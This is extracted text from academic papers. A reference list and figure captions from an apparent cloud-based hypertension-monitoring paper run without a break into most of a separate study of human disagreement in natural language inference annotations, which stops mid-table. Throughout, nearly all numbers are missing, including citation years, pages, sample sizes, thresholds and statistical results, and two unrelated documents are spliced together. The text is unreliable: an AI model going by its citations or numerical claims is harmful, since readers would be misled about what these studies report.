monitoring and self-management in the control of hypertension (tas- minh ): a randomised controlled trial. the lancet, ( ): - . . [ ] green bb, cook aj, ralston jd, fishman pa, catz sl, carlson j, carrell d, tyll l, larson eb, thompson rs. effectiveness of home blood pressure monitoring, web communication, and pharmacist care on hypertension control: a randomized controlled trial. jama, ( ): - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, teixidó i, mateo j, rius j. h-pc: a cloud computing tool for supervising hypertensive patients. journal of supercomputing, ( ): - . . [ ] law mr, morris jk, wald nj. use of blood pressure lowering drugs in the prevention of cardiovascular disease: meta-analysis of randomised tri- als in the context of expectations from prospective epidemiological stud- ies. bmj, :b . . [ ] dickinson ho, mason jm, nicolson dj, campbell f, beyer fr, cook jv, williams b, ford ga. lifestyle interventions to reduce raised blood pressure: a systematic review of randomized controlled trials. j hyper- tens, - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, alves r, mateo j. s-pc: an e-treatment application for management of smoke-quitting patients. computer methods and programs in biomedicine, ( ): - . . [ ] abbas a, khan su. a review on the state-of-the-art privacy- preserving approaches in the e-health clouds. journal of biomedical and health informatics, ( ): - . . [ ] vilaplana j, solsona f, abella f, cuadrado j, teixidó i, mateo j, rius j. h-pc: a cloud computing tool for supervising hypertensive patients. the journal of supercomputing, ( ): - . . [ ] mateo j, vilaplana j, pla lm, lerida jl, solsona f. a green strat- egy for federated and heterogeneous clouds with communicating work- loads. the scientific world journal, : - . . [ ] vilaplana j, solsona f, abella f, filgueira r, rius j. the cloud paradigm applied to e-health. bmc medical informatics and de- cision making, vol ( ): - . http://www.biomedcentral.com/ - / / . . [ ] vilaplana j, solsona f, teixidó i, mateo j, abella f, rius j. a queuing theory model for cloud computing. journal of supercomputing, ( ): - . . [ ] vilaplana j, solsona f, mateo j, teixido i. sla-aware load balancing in a web-based cloud system over openstack. lecture notes in com- puter science, : - . . [ ] lai cc, lee rg, hsiao cc, liu hs, chen cc. a h-qos-demand per- sonalized home physiological monitoring system over a wireless multi-hop relay network for mobile home healthcare. journal of network and com- puter applications, ( ): - . . [ ] world health organization. second global survey on ehealth (global observatory for ehealth). geneva: world health organization; . mhealth: new horizons for health through mobile technologies url: http://www.who.int/goe/publications/goe mhealth web.pdf. ac- cessed - - . [ ] patel b, turban s, anderson c, charleston j, miller e, appel l. a com- parison of web sites used to manage and present home blood pressure readings. j clin hypertens, : - . . [ ] bigna jjr, noubiap jjn, kouanfack c, plottel cs, koulla-shiro s. effect of mobile phone reminders on follow-up medical care of children exposed to or infected with hiv in cameroon (more care): a mul- ticentre, single-blind, factorial, randomised controlled trial. the lancet infectious diseases, ( ): - . . [ ] liu q, abba k, alejandria mm, sinclair d, balanag vm, lansang ma. reminder systems to improve patient adherence to tuberculosis clinic appointments for diagnosis and treatment. cochrane database syst rev, ( ):cd . . [ ] carrasco mp, salvador ch, sagredo pg, márquez-montes j, gonzález de mingo ma, fragua ja, rodŕıguez mc, garćıa-olmos lm, garcia- lópez f, carrero am, monteagudo jl. impact of patient-general practi- tioner short-messages-based interaction on the control of hypertension in a follow-up service for low-to-medium risk hypertensive patients: a ran- domized controlled trial. ieee trans inf technol biomed, ( ): - . . [ ] hamine s, gerth-guyette e, faulx d, green bb, ginsburg as. impact of mhealth chronic disease management on treatment adherence and patient outcomes: a systematic review. j med internet res, ( ):e . . [ ] benharref a, serhani ma. novel cloud and soa-based framework for e-health monitoring using wireless biosensors. biomedical and health informatics, ieee journal of ( ): - . . [ ] calheiros r, ranjan r, beloglazov a, de rose c, buyya r. cloudsim: a toolkit for modeling and simulation of cloud computing environ- ments and evaluation of resource provisioning algorithms. software: practice and experience, ( ): - . . [ ] miller rb. response time in man-computer conversational transactions. proc. afips fall joint computer conference, : - . . figure (on next page) hbpf operation mobile clinician internet blood pressure pa ent database server hm bpcontrol hm. the names that appear in the figure are invented figure (on next page) hm architecture apache scheduleer mysql cluster vm vm vm vm vm vm host host openstack openstack task firewall ajp consultation readings response time throughput scalability inherent disagreements in human textual inferences ellie pavlick brown university ellie pavlick@brown.edu tom kwiatkowski google research tomkwiat@google.com abstract we analyze human’s disagreements about the validity of natural language inferences. we show that, very often, disagreements are not dismissible as annotation ‘‘noise’’, but rather persist as we collect more ratings and as we vary the amount of context provided to raters. we further show that the type of uncertainty captured by current state-of-the-art models for natural language inference is not reflective of the type of uncertainty present in human disagreements. we discuss implications of our results in relation to the recognizing textual entailment (rte)/natural language inference (nli) task. we argue for a refined evaluation objective that requires models to explicitly capture the full distribution of plausible human judgments. introduction entailment is arguably one of the most fun- damental of language understanding tasks, with montague himself calling entailment ‘‘the basic aim of semantics’’ (montague, ). compu- tational work on recognizing textual entailment (rte) (also called natural language inference, or nli) has a long history, ranging from early efforts to model logical phenomena (cooper et al., ), to later statistical methods for modeling practical inferences needed for applications like informa- tion retrieval and extraction (dagan et al., ), to current work on learning common sense hu- man inferences from hundreds of thousands of examples (bowman et al., ; williams et al., ). broadly speaking, the goal of the nli task is to train models to make the inferences that a human would make. currently, ‘‘the inferences that a human would make’’ are determined by asking multiple human raters to label pairs of sentences, and then seeking some consensus among them. for example, having raters choose among discrete labels and taking a majority vote (dagan et al., ; bowman et al., ; williams et al., ), or having raters use a continuous likert scale and taking an average (pavlick and callison-burch, a; zhang et al., ). that is, the prevailing assumption across annotation methods is that there is a single ‘‘true’’ inference about h given p that we should train models to predict, and that this label can be approximated by aggregating multi- ple (possibly noisy) human ratings as is typical in many other labelling tasks (snow et al., ; callison-burch and dredze, ). often, however, we observe large disagree- ments among humans about whether or not h can be inferred from p (see figure ). the goal of this study is to establish whether such disagree- ments can safely be attributed to ‘‘noise’’ in the annotation process (resolvable via aggregation), or rather are a reproducible signal and thus should be treated as part of the nli label assigned to the p/h pair. specifically, our primary contributions are: • we perform a large-scale study of humans’ sentence-level inferences and measure the degree to which observed disagreements persist across samples of annotators. • we show that current state-of-the-art nli systems do not capture this disagreement by default (by virtue of treating nli as probabilistic) and argue that nli evaluation should explicitly incentivize models to pre- dict distributions over human judgments. • we discuss our results with respect to the definition of the nli task, and its increased usage as a diagnostic task for evaluating ‘‘general purpose’’ representations of natural language. c© association for computational linguistics. distributed under a cc-by . license. transactions of the association for computational linguistics, vol. , pp. – , . https://doi.org/ . /tacl a action editor: christopher potts. submission batch: / ; published: / . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://doi.org/ . /tacl_a_ figure : example p/h pair on which humans exhibit strong disagreements about whether h can be inferred from p. here, the disagreement appears to stem from the implicature, but we observe similar disagreements on a variety of linguistic phenomena. the rte/nli task the task of rte/nli is fundamentally concerned with drawing conclusions about the world on the basis of limited information, but specifically in the setting when both the information and the conclusions are expressed in natural language. that is, given a proposition p, should one infer some other proposition h to be true? traditionally, in formal linguistics, the defini- tion of entailment used is that defined in formal logic—namely, p entails h if h is true in every possible world in which p is true. this logical definition takes for granted that lexical and con- structional meanings are fixed in such a way that it is possible to fully pre-specify and then repeatedly apply those meanings across all contexts. from the point of view of evaluating nlp systems’ ability to reason about entailment, these are clearly diffi- cult criteria to operationalize. thus, within nlp, we have rarely if ever evaluated directly against this definition. rather, work has been based on the below informal definition: p entails h if, typically, a human reading p would infer that h is most likely true. . . [assuming] common human un- derstanding of language [and] common background knowledge (dagan et al., ). this definition was intended to undergo refine- ment overtime, with dagan et al. ( ) explicitly stating that the definition was ‘‘clearly not mature yet’’ and should evolve in response to observed shortcomings, and, in fact, substantial discussion surrounded the original definition of the rte task. in particular, zaenen et al. ( ) argued that the definition needed to be made more precise, so as to circumscribe the extent to which ‘‘world knowledge’’ should be allowed to factor into in- ferences, and to explicitly differentiate between distinct forms of textual inference (e.g., entailment vs. conventional implicature vs. conversational implicature). manning ( ) made a counter- argument, pushing back against a prescriptivist definition of what types of inferences are or are not licensed in a specific context, instead advocat- ing that annotation tasks should be ‘‘natural’’ for untrained annotators, and that the role of nlp should be to model the inferences that humans make in practical settings (which include not just entailment, but also pragmatic inferences such as implicatures). both supported the use of the term ‘‘inference’’ over ‘‘entailment’’ to acknowledge the divergence between the working nlp task definition and the notion of entailment as used in formal semantics. since the task’s introduction, there has been no formal consensus around which of the two approaches offers the better cost–benefit tradeoff: precise (at risk of being impractical), or organic (at risk of being ill-defined). that said, there has been a clear gravitation toward the latter, apparent in the widespread adoption of inference datasets that explicitly prioritize natural inferences over rigorous annotation guidelines (bowman et al., ; williams et al., ), and in the overall shift to the word ‘‘inference’’ over ‘‘entailment.’’ there has also been significant empirical evidence supporting the argument that humans’ semantic inferences are uncertain and context-sensitive (poesio and artstein, ; versley, ; simons et al., ; recasens et al., ; de marneffe et al., ; passonneau et al., ; pavlick and callison-burch, a,b; tonhauser et al., , among others) suggesting computational models would benefit from focusing on ‘‘speaker meaning’’ over ‘‘sentence meaning’’ when it comes to nli (manning, ; westera and boleda, ). thus, in this paper, we assume that nlp will maintain this hands-off approach to nli, avoiding definitions of what inferences humans should make or which types of knowledge they should invoke. we take the position that, ultimately, our we, too, adopt the word ‘‘inference’’ for this reason. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april goal in nlp is to train models that reverse- engineer the inferences a human would make when hearing or reading language in the course of their daily lives, however ad-hoc the process that generates those inferences might be. therefore, our question in this paper is not yet what process humans use to draw inferences from natural lan- guage, but merely: left to their own devices, do humans, in general, tend to follow the same process? note that this question is independent of the decision of whether to treat annotations as discrete versus gradable. even if nli is treated as a gradable phenomenon (as we believe it should be), a world in which all humans share the same notion of uncertainty necessitates very different models, annotation practices, and modes of evaluation than a world in which people may disagree substan- tially in specific situations, use different heuristics, and/or have different preferences about how to resolve uncertainty. specifically, current practices— in which we aggregate human judgments through majority vote/averaging and evaluate models on their ability to predict this aggregated label—are only appropriate if humans all tend to use the same process for resolving uncertainties in practice. nli data and annotation to perform our analysis, we collect nli judg- ments at × redundancy for sentence pairs drawn from a variety of existing nli datasets. our anno- tation procedure is described in detail in this section. all of the data and collected anno- tations are available at https://github. com/epavlick/nli-variation-data. . sentence pairs we draw our p/h pairs from the training sets of each of the following five datasets: rte (dagan et al., ), snli (bowman et al., ), mnli (williams et al., ), joci (zhang et al., ), and dnc (poliak et al., b). table shows randomly sampled positive (p → h) and negative (p �→ h) examples from each. these datasets differ substantially in the procedures used to generate the data, and in the types of inferences they attempt to test. rte consists of premises/hypothesis pairs derived predominantly from the output of information retrieval systems run over newswire text and annotated by experts (researchers in the field). snli consists of premises derived from image captions with hypotheses written and judged by non-expert (crowdsourced) annotators. mnli was constructed in the same way as snli but contains premises drawn from a range of text genres, including letters, fiction, and telephone conversations. joci is intended to target ‘‘com- mon sense’’ inferences, and contains premises drawn from existing nli datasets paired with hypothesis that were automatically generated via either templates or seq seq models and then refined by humans. the dnc consists predomi- nantly of naturally occurring premises paired with template-generated hypotheses, and comprises a number of sub-corpora aimed at testing systems’ understanding of specific linguistic phenomena (e.g., lexical semantics, factuality, named entity recognition). we draw from this variety of data- sets in order to ensure a diversity of types of tex- tual inference and to mitigate the risk that the disagreements we observe are driven by a specific linguistic phenomenon or dataset artifact on which humans’ interpretations particularly differ. we sample p/h pairs from each dataset. in every dataset, we limit to pairs in which the premise and the hypothesis are both less than or equal to words, to minimize cognitive load during annotation. we attempt to stratify across expected labels to ensure an interesting balance of inference types. for rte , snli, and mnli, this means stratifying across three categories (entailment/contradiction/neutral). for joci, the p/h pairs are labeled on a five-point likert scale, where denotes that h is ‘‘impossible’’ given p and denotes that h is ‘‘very likely’’ given p, and thus we stratify across these five classes. in the dnc, all sub-corpora consist of binary labels (entailment/non-entailment) but some sub- corpora contain finer-grained labels than others (e.g., three-way or five-way labels). thus, when sampling, we first stratify across sub-corpora and then across the most fine-grained label type available for the given sub-corpus. . annotation we show each p/h pair to independent raters on amazon mechanical turk. we ask them to we skip the subset of joci that was drawn from snli, to avoid redundancy with our own snli sample. we skip two sub-corpora (verbcorner and puns), the former because it contains nonced words and thus is difficult to ask humans to label without some training, and the latter because of the potential for noisy labels due to the fact that some people, bless their hearts, just don’t appreciate puns. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/epavlick/nli-variation-data https://github.com/epavlick/nli-variation-data snli three dogs on a sidewalk. → there are more than one dog here. a red rally car taking a slippery turn in a race. → ¬ the car is stopped at a traffic light. mnli historical heritage is very much the theme at ichidani. → ichidani’s historical heritage is important. okay i uh i have five children all together → ¬ i do not have any children. rte self-sufficiency has been turned into a formal public awareness campaign in san francisco, by mayor gavin newsom. → gavin newsom is a politician of san francisco. the unconfirmed case concerns a rabies-like virus known only in bats → ¬ a case of rabies was confirmed. joci it was charlie ’s first day of work at the new firm → the firm is a business. a young girl is holding her teddy bear while riding a pony . → ¬ the bear attacks. dnc tony bent the rod. → tony caused the bending. when asked about the restaurant, jonah said, ‘sauce was tasteless.’ �→ jonah liked the restaurant. table : examples of p/h pairs from each of our source datasets. the top pair is one labeled by the original dataset as a valid inference (one that should be drawn), the bottom as an invalid inference (either h is contradictory given p (p → ¬h), or h simply cannot be inferred (p �→ h)). for dnc, examples shown are from the verbnet (top) and sentiment (bottom) sub corpora. indicate using a sliding bar, which ranges from − to , how likely it is that h is true given that p is true, where − means that h is definitely not true (p → ¬h), means that h is definitely true (p → h), and means that h is consistent with but not necessarily true given p (p �→ h). raters also have the option to indicate with a checkbox that either/both of the sentences do not make sense and thus no judgment can be made. we attempt to pitch the task intuitively and keep the instructions light, for reasons discussed in section . we provide brief instructions followed by a few examples to situate the task. our exact instructions and examples are shown table . raters label pairs in batches of , meaning we have a minimum of ratings per rater. we pay $ . per set of . we restrict to raters who have a % or better approval rating with at least hits approved, and who are located in a country in which english is the native language (us, canada, uk, australia, new zealand). . preprocessing filtering. in total, we had workers complete our hits, with an average of . tasks ( sentence pairs) per worker. we follow the methods from white et al. ( ) and remove workers who demonstrate consistently low correlations with others’ judgments. specifically, for each sentence pair s, for each worker wi, we compute the spearman correlation between wi’s labels and raters do not see specific numbers on the slider. for each pair of sentences, assume that the first sentence (s ) is true, describes a real scenario, or expresses an opinion. using your best judgment, indicate how likely it is that the second sentence (s ) is also true, describes the same scenario, or expresses the same opinion. if either sentence is not interpretable, check the ‘‘does not make sense’’ box. several examples are given below. example : in the below example, the slider is far to the right because we can be very confident that if a person is ‘‘on a beach’’ than that person is ‘‘outside’’. s : a woman is on a beach with her feet in the water. s : the woman is outside. example : in the below example, the slider is far to the left because we can be very confident that if a person is ‘‘on a beach’’ then that person is not ‘‘in her living room’’. s : a woman is on a beach with her feet in the water. s : the woman is in her living room. example : in the below example, the slider is in the center because knowing that woman is on the beach does not give us any information about the color of her hair and so we cannot reasonably make a judgment about whether or not her hair is brown. s : a woman is on a beach with her feet in the water. s : the woman has brown hair. table : instructions and examples shown to raters. raters indicated their responses using a sliding bar which ranged from − to . in the instructions actually shown, the examples were shown alongside a sliding bar reflecting the desired rating. exact ui not shown for compactness. every other wj who labeled s. across all pairs of workers, the mean correlation is . . we consider a pair of workers on a given assignment to be an outlier if the correlation between those workers’ ratings falls outside . times the interquartile downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april range of all the correlations (white et al., ). we find pairs to be outliers, and that they can be attributed to individual workers. we therefore remove all annotations from these workers from our analysis. additionally, we remove ratings from workers who have fewer than useable data points (i.e., judgments not including cases in which they choose the ‘‘does not make sense’’ option), as this will prevent us from properly estimating and thus correcting for their individual annotation bias (described in the following section). finally, we remove p/h pairs that, after removing all problematic workers and ‘‘does not make sense’’ judgments, are left with fewer than judgments. in the end, we have p/h pairs with a mean of labels per pair. normalization. one confound that results from collecting annotations on a continuous scale is that each rater may choose to use the scale differently. thus, we apply z-score normalization to each worker’s labels for each assignment, meaning each worker’s ratings are rescaled such that the mean across all labels from a single worker within a single batch is and the standard deviation is . this normalization is not perfect, as every batch has a slightly different set of pairs, and so normalized scores are not comparable across batches. for example, if, by chance, a batch were to contain mostly pairs for which the ‘‘true’’ label was p → h, a score of zero would imply p → h, whereas if a batch were to include mostly pairs for with the ‘‘true’’ label was p → ¬h, zero would correspond to p → ¬h. however, for the purposes of our analysis, this is not problematic; because our interest is comparing disagreements between annotations on each specific p/h pair, it is only important that two worker’s labels on the same pair are comparable, not that judgments across pairs are comparable. results presented throughout are based on data with these workers removed. however, rerunning analysis with these workers included did not affect our overall takeaways. on our own manual inspection, it is nearly always the case that the mean ( ) is roughly interpretable as neutral, with only moderate deviations from one example to the next. nonetheless, when interpreting the figures in the following sections, note that the center of one pair’s distribution is not necessarily comparable to the center of another’s. analysis of human judgments . experimental design we aim to establish whether the disagreements observed between humans’ nli judgments can be attributed to ‘‘noise’’ in the annotation process. we make the assumption that, if the disagreements are attributable to noise, then the observed human judgments can be modeled as a simple gaussian distribution, where the mean is the true label. this model can account for the fact that some cases might be inherently harder than others—this could, for example, be reflected by higher variance— but, overall, the labels are nonetheless in ac- cordance with the assumption that there exists a fundamentally ‘‘true’’ label for each p/h pair which we can faithfully represent via a single label or value, obtainable via aggregation. for each sentence pair, we randomly split the collected human labels into train and test. specifically, we hold out labels from each pair to use as our test set. the training data are composed of the remaining labels, which varies in number from to , depending on how many labels were left for that pair after preprocessing (see section . ). the average number of training labels is . for each sentence pair, we use the training data to fit two models: ) a single gaussian and ) a gaussian mixture model where the number of components is chosen during training, meaning that the model may still choose to fit only one component if appropriate. we compute the log likelihood assigned to the held-out test data under each model, and observe how often, and to what extent, the additional components permitted by the gmm yield a better fit for the held out judgments. if the mixture model frequently choses to use more than one effective component, and if doing so results in a better fit for the held-out data than the unimodal gaussian, we interpret this as evidence that, for many sentence pairs, human judgments exhibit reproducibly multimodal distributions. thus, for such sentence pairs, the current practice of aggregating human judgments into a single label would fail to accurately capture the types we use the variational bayesian estimation of a gaussian mixture provided in scikit learn, with the maximum number of components set to be the number of points in the training data: https://scikit-learn.org/stable/modules/ generated/sklearn.mixture.bayesiangaussian mixture.html downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html https://scikit-learn.org/stable/modules/generated/sklearn.mixture.bayesiangaussianmixture.html figure : log likelihood assigned to test data under the single-component gaussian (x-axis) vs the k- component gmm (y-axis). results show an average over random train/test splits; error bars not shown to reduce clutter. overall, multimodal distributions generalize better to unseen human judgments than do single gaussians. of semantic inferences that humans might make about the given p/h pair. . results are distributions unimodal? figure shows, for each sentence pair, the test log likelihood under the one-component gaussian model versus the k-component gmm. if the data were in fact sampled from an underlying distribution defined by a single gaussian, we would expect the points to be distributed approximately randomly around the y = x line. that is, most of the time the gmm would provide no advantage over the sin- gle gaussian. what we see instead is that the majority of points fall on or above the y = x line, indicating that, when there is a difference, the additional components deemed necessary in training tend to generalize to unseen human judgments. very few points fall below the y = x line, indicating that when models choose to fit multiple components, they are correctly modeling the true data distribution, rather than overfitting the training set. we note that the majority of points fall on y = x, indicating that most examples do exhibit consensus around one ‘‘true’’ label. figure shows, for each sentence pair, the weights of the effective components according the the we verified that, if forced to fit more than one com- ponent, the model often overfits, confirming that these examples are indeed best modeled as unimodal distributions. figure : weights of effective components for each p/h pair. y-axis corresponds to the pairs in our data, sorted by weight of the second component. the figure should be interpreted as follows: when the line is all blue (pair # ), the gmm found a single component with a weight of . when the line contains mixed col- ors, the model found multiple components with the depicted weights (e.g., pair # has two components of equal weight). gmm. we see that for % of the sentence pairs, there is a nontrivial second component (weight > . ), but rarely are there more than two components with significant weights. figure shows several examples of sentences for which the annotations exhibit clear bimodal distributions. these examples show the range of linguistic phenomena that can give rise to un- certainty. in the first example, from snli, there appears to be disagreement about the degree to which two different descriptions could potentially refer to the same scenario. in the second example, from dnc and derived from verbnet (chklovski and pantel, ), there is disagreement about the manner aspect of ‘‘swat’’, that is, whether or not ‘‘swatting’’ is necessarily ‘‘forceful’’. in the third example, from dnc and derived from the megaverdicality dataset (white and rawlins, ), there appears to be disagreement about the degree to which ‘‘confess that’’ should be treated as factive. these examples highlight legitimate disagree- ments in semantic interpretations, which can be difficult to control without taking a highly pre- scriptivist approach to annotation. doing so, by corpus, rte exhibits the least variation and joci exhibits the most, though all of the corpora are comparable. we did not see particularly interesting trends when we broke down the analysis by corpus explicitly, so, for brevity, we omit the finer-grained analysis. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : examples of sentence pairs with bi-modal human judgment distributions. examples are drawn from snli, the verbnet portion of dnc, and the megaverdicality portion of dnc (from left to right). training distribution is in blue; test in orange. dotted black line shows the model fit when using a single component; shaded gray shows the model learned when allowed to fit k components. distributions are over z-normalized scores in which roughly corresponds to neutral (p �→ h) but not precisely (§ . ). however, would compromise both the ‘‘natural- ness’’ of the task for annotators and the empiricist approach to representation learning currently de- sired in nlp (as discussed in section ). does context reduce disagreement? one fair objection to these results is that sentence-level inferences are problematic due to the lack of context provided. it is reasonable to believe that the divergences in judgments stem from the fact that, when details of the context are left unspecified, different raters choose to fill in these details differently. this would inevitably lead to different inferences, but would not be reflective of differences in humans’ representations of lin- guistic ‘‘meaning’’ as it pertains to nli. we thus explore whether providing additional context will yield less-divergent human judgments. to do this, we construct a small dataset in which we can collect annotations with varying levels of context, as described next. method. we sample sentences from wikipedia, restricting to sentences that are at least four words long and contain a subject and a verb. we consider each of these sentences to be a candidate premise (p), and generate a corresponding hypothesis (h) by replacing a word w from p with a substitute w , where w has a known lexical semantic re- lationship to w . specifically, we use as set of word pairs: hypernym/hyponym pairs, antonym pairs, and co-hyponym pairs. we chose these categories in order to ensure that our analysis consists of meaningful substitutions and that it covers a variety of types of inference judgments. our hypernyms and antonyms are taken from wordnet (fellbaum, ), with hy- pernyms limited to first-sense immediate hyper- nyms. our co-hyponyms are taken from an internal database, which we constructed by running hearst patterns (hearst, ) over a large text corpus. the word pairs we used are available for inspection at https://github.com/epavlick/nli- variation-data. after making the substitution, we score each candidate p and h with a language model (józefowicz et al., ) and disregard pairs for which the perplexity of h is more than points above that of p. this threshold was chosen based on manual inspection of a sample of the output, and is effective at removing sentences in which the substitution yielded a meaningless hypothesis—for example, by replacing a w that was part of a multiword expression. for each resulting p/h pair, we collect ratings at three levels: word level, in which p and h are each a single word; sentence level, in which p and h are each a sentence; and paragraph level, in which p is a full paragraph and h is a sentence (as depicted in figure ). we use the same anno- tation design as described in section . . to quantify the level of disagreement in the observed judgments, we compute two measures: ) variance of observed ratings and ) Δ log likelihood, that is, the change in log likelihood of held out data that results from using a k-component gmm over a single-component gaussian (as described in the previous section). we note that Δ log likelihood is a more direct measure of the type of disagreement in which we are interested in this paper (i.e., disagreements stemming from multimodal distributions of judgments that are downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/epavlick/nli-variation-data https://github.com/epavlick/nli-variation-data figure : distributions of variances (top) and Δ log likelihood (bottom) for human ratings resulting from word, sentence, and paragraph contexts. the average variances of all levels are significantly different at p < . (word < sentence < paragraph). average Δll for words was significantly lower than for sentences and paragraphs, but there is no significant difference between sentences and paragraphs. not well summarized by a single label/value). high variance distributions may correspond to ‘‘difficult’’ cases which are nonetheless still unimodal. results. figure shows the distribution of each metric as a function of the level of context given to raters. the trend is counter to our initial intuition: both measures of disagreement actually increase when raters see more context. on aver- age, we see a variance of . ± . when raters are shown only words, . ± . when raters are shown sentences, and . ± . when rat- ers are given a full paragraph of context ( % con- fidence intervals). the trend for Δ log likelihood is similar: disagreement at the word level ( . ± . ) is significantly lower than at the sentence ( . ± . ) and paragraph ( . ± . ) level, though there is no significant difference in Δ log likelihood between sentence-level and paragraph-level. figure shows an example p/h pair for which additional context increased the variance among annotators. in the example shown, humans are generally in agreement that ‘‘boating’’ may or may not imply ‘‘picknicking’’, when no additional context is given. however, when information is provided which focuses on boating on a specific canal, emphasizing the activities that the water itself is used for, people diverge in their inference judgments, with one group centered around contradiction and a smaller group centered around neutral. we interpret these results as preliminary evi- dence that disagreement is not necessarily control- lable by providing additional context surrounding the annotation (i.e., we do not see evidence that increasing context helps, and it may in fact hurt). we hypothesize that, in fact, less context may result in higher agreement due to the fact that humans can more readily call on conventional- ized ‘‘default’’ interpretations. for example, in the case of single words, people likely default downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : in the word case, human judges were shown only the words (bolded); in the sentence case, judges were shown pairs of sentences (gray highlight); in the paragraph case, judges were shown all of the text. judges did not see markup (bold/highlight) when presented the text to judge. gray bars show distribution of z-normalized scores, ticks show raw (unnormalized) scores, bell curves are estimated by the gmm. to reading them as referring expressions for a single entity/event, and thus make judgments con- sistent with the prototypical lexical entailment relations between these words. additional con- text provides increased opportunity for inferences based on pragmatics and world knowledge (e.g., inferences about the question under discussion and the speaker’s intent), which are less likely to follow consistent conventions across all raters. we consider this study exploratory, as there are some confounds. most notably, increasing the amount of context clearly increases cognitive load on annotators, and thus we would expect to see increased variance even if there were no increase in actual interpretive disagreements. however, the increase in the Δ log likelihood metric is more meaningful, because randomly distributed noise (which we might expect in the case of high cog- nitive load/low annotator attention) should lead to higher variance but not multimodality. more work is needed to explore this trend further, and to determine whether increasing context would be a viable and productive means for reducing disagreements on this task. analysis of model predictions . motivation another natural question arising from the analysis presented thus far is whether the phenomenon under investigation even poses a problem for nlp systems at all. that is, whether or not hu- mans’ judgments can be summarized by a single aggregate label or value might be a moot question, since state-of-the-art models do not, in practice, predict a single value but rather a distribution over values. it may be the case that these predicted distributions already reflect the distributions observed in the human judgments and thus that the models can be viewed as already adequately capturing the aspects of semantic uncertainty that cause the observed human disagreements. we thus measure the extent to which the softmax distributions produced by a state-of-the-art nli model trained on the dataset from which the p/h pairs were drawn reflects the same distribution as our observed human judgments. . experimental design data. nli is standardly treated as a classi- fication task. thus, in order to interface with existing nli models, we discretize our collected human judgments by mapping the raw (un- normalized) score (which is between − and ) into k evenly sized bins, where k is equal to the number of classes that were used in the original dataset from which the p/h pair was drawn. specifically, for pairs drawn from datasets which use the three-way entailment/ contradiction/neutral labels (i.e., snli, mnli, and rte ), we consider human scores less than − . to be contradiction, those greater than . to be entailment, and those in between to be neutral. for the binary tasks (dnc), we use the same three-way thresholds, but consider scores below . to be nonentailment and those above to be entailment. after some experimentation, we ultimately choose to map the we experimented with multiple variations on this mapping, including using the z-normalized (rather than the raw) human scores, and using bins based on percentiles rather than evenly spaced over the full range. none of these variants noticeably affected the results of our analysis or the conclusions presented in the following section. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april orig./ bert/ bert/ ours orig ours ∩ snli . . . mnli . . . rte . . . dnc . . . joci . . . table : left to right: agreement between datasets’ original labels and the majority label according to our (discretized) re-annotation; accuracy of bert nli model against original labels; accuracy of bert against re-annotation labels; number of p/h pairs (out of ) on which all three label sources (original, re-annotation, model prediction) agree on the most likely label. our analysis in § . is performed only over pairs in ∩. joci scores to a three-way classification scheme as well, rather than the original five-way scheme, using = contradiction, { , , } = neutral, and = entailment. this decision was made after observing that, although our overall results and conclusions remained the same regardless of the way we performed the mapping, the three-way mapping led to higher levels of agreement between the original labels and our newly collected labels, and thus gave the model the best chance of learning the distribution against which it will be tested. agreement between the original labels (i.e., those in the published version of the data) and our discretized newly collected labels are given in the first column of table . we note that measuring agreement and model accuracy in terms of these discrete distributions is not ideal, and it would be preferable to train the model to directly predict the full distributions, but because we do not have sufficient training data to do this (we only collected full distributions for p/h pairs per dataset) we must work in terms of the discrete labels provided by the existing training datasets. model. we use pretrained bert (devlin et al., ), fine-tuned on the training splits of the datasets from which our test data was drawn. that is, we fine-tune bert five times, once on each dataset, and then test each model on the subset of our re-annotated p/h pairs that were drawn from we also try removing joci from our analysis entirely, since it is the noisiest dataset, and still reach the same conclusions from our subsequent analysis. https://github.com/google-research/bert the dataset on which it was fine-tuned. we remove from each training set the p/h pairs that we had re-annotated (i.e., the data we use for testing). we use the bert nli model off-the-shelf, without any changes to architecture, hyperparameters, or training setup. table shows the accuracy of each model on the test set (i.e., our re-annotated sentences) when judged against ) the original (discrete) label for that pair given in the standard version of the dataset (i.e., the same type of label on which the model was trained) and ) our new (discretized) label derived from our re-annotation. table also gives the agreement between the original discrete labels and the discretized re-annotation labels. metrics. we want to quantify how well the model’s predicted softmax distribution captures the distribution over possible labels we see when we solicit judgments from a large sample of annotators. to do this, we consider the model softmax to be a basic multinomial distribution, and compute ) the probability of the observed human labels under that multinomial and ) the cross- entropy between the softmax and the observed human distributions. as a point of comparison, we compute the same metrics for a random sample, of equal size to the set of observed labels, drawn from the multinomial defined by the softmax. we focus only on p/h pairs on which all three label sources (i.e., the original label provided by the official dataset, the new label we produce by taking the majority vote of our newly collected, discretized human judgments, and the model’s prediction) agree. that is, because we want to evaluate whether the model captures the distrib- ution (not just the majority class that it was trained to predict) we want to focus only on cases where it at least gets the majority class right. because we want to compare against the full distribution of discretized human labels we collected, we don’t want to consider cases where the majority class according to this distribution disagrees with the majority class according to the model’s training data, since this would unfairly penalize the model. table shows the number of pairs (out of ) on which these three label sources agree, for each dataset. . results overall, the softmax is a poor approximation of the distribution observed across the human downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/google-research/bert cross ent. log prob. exp. . ( . , . ) − . (− . , − . ) obs. . ( . , . ) − . (− . , − . ) table : softmax is not a good estimate of the distribution of human labels. exp. refers to the sim- ilarity values we expect due to random variation (i.e., what we get when we compute against a ran- dom sample drawn from the multinomial defined by the softmax). obs. refers to the similarity values between the softmax distribution and the human distribution. numbers in parentheses give % confidence intervals. results are effectively the same 